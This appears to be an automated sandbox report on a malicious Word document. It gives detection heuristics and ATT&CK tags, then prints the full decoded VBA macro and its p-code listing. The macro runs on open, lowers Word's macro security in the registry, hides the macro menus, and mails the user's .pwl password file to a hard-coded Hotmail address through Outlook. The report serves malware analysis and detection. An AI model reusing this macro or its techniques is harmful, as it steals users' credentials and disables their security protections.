MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1071.001 Web Protocols
The sample is a malicious Word document containing a VBA macro that executes upon opening (Document_Open). The macro attempts to create an Outlook Application object and send an email to 'neetazz86@hotmail.com' with the subject 'Pwl From <UserName>' and a body of 'Here it is'. It attaches a file named '<UserName>.pwl' located in the user's Windows directory. This behavior suggests an attempt to exfiltrate or distribute sensitive information, potentially related to password files, or to spread further via email.
Heuristics 4
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5114 bytes |
SHA-256: 23ded3e2614510c1de86e83d556b87fd67345d8b1bc9418b8b5b2d6959ac31c5 |
|||
|
Detection
ClamAV:
Win.Trojan.wmvg-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_New()
End Sub
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1
Else
CommandBars("Tools").Controls("Macro").Enabled = False
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice, GetUser, Xx
Dim ThePath As String * 255
Dim PwlPath As String
GetUser = Application.UserName
Xx = GetWindowsDirectory(ThePath, 255)
PwlPath = Left(ThePath, Xx) & "\" & GetUser & ".pwl"
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
DasMapiName.Logon
TheAddress = "neetazz86@hotmail.com"
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
BreakUmOffASlice.Recipients.Add TheAddress
BreakUmOffASlice.Subject = "Pwl From " & Application.UserName
BreakUmOffASlice.Body = "Here it is"
BreakUmOffASlice.Attachments.Add PwlPath
BreakUmOffASlice.Send
BreakUmOffASlice.Delete
DasMapiName.Logoff
' Selection.TypeText PwlPath
End Sub
Attribute VB_Name = "Module1"
Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
'ucbC><Kd
' Processing file: /opt/analyzer/scan_staging/d5f09024d48247d0912e7e319d93cd7b.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 7428 bytes
' Line #0:
' Line #1:
' Line #2:
' FuncDefn (Private Sub Document_New())
' Line #3:
' Line #4:
' EndSub
' Line #5:
' Line #6:
' FuncDefn (Private Sub Document_Open())
' Line #7:
' OnError (Resume Next)
' Line #8:
' LitStr 0x0000 ""
' LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' LitStr 0x0005 "Level"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' LitStr 0x0000 ""
' Ne
' IfBlock
' Line #9:
' LitVarSpecial (False)
' LitStr 0x000B "Security..."
' LitStr 0x0005 "Macro"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' MemSt Enabled
' Line #10:
' LitDI2 0x0001
' LitStr 0x0000 ""
' LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' LitStr 0x0005 "Level"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #11:
' ElseBlock
' Line #12:
' LitVarSpecial (False)
' LitStr 0x0005 "Macro"
' LitStr 0x0005 "Tools"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' MemSt Enabled
' Line #13:
' EndIfBlock
' Line #14:
' Line #15:
' Dim
' VarDefn UngaDasOutlook
' VarDefn DasMapiName
' VarDefn BreakUmOffASlice
' VarDefn GetUser
' VarDefn Xx
' Line #16:
' Dim
' LitDI2 0x00FF
' VarDefn ThePath
' Line #17:
' Dim
' VarDefn PwlPath (As String)
' Line #18:
' Line #19:
' Ld Application
' MemLd UserName
' St GetUser
' Line #20:
' Ld ThePath
' LitDI2 0x00FF
' ArgsLd GetWindowsDirectory 0x0002
' St Xx
' Line #21:
' Ld ThePath
' Ld Xx
' ArgsLd LBound 0x0002
' LitStr 0x0001 "\"
' Concat
' Ld GetUser
' Concat
' LitStr 0x0004 ".pwl"
' Concat
' St PwlPath
' Line #22:
' Line #23:
' SetStmt
' LitStr 0x0013 "Outlook.Application"
' ArgsLd CreateObject 0x0001
' Set UngaDasOutlook
' Line #24:
' SetStmt
' LitStr 0x0004 "MAPI"
' Ld UngaDasOutlook
' ArgsMemLd GetNameSpace 0x0001
' Set DasMapiName
' Line #25:
' Line #26:
' Ld DasMapiName
' ArgsMemCall Logon 0x0000
' Line #27:
' LitStr 0x0015 "neetazz86@hotmail.com"
' St TheAddress
' Line #28:
' SetStmt
' LitDI2 0x0000
' Ld
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.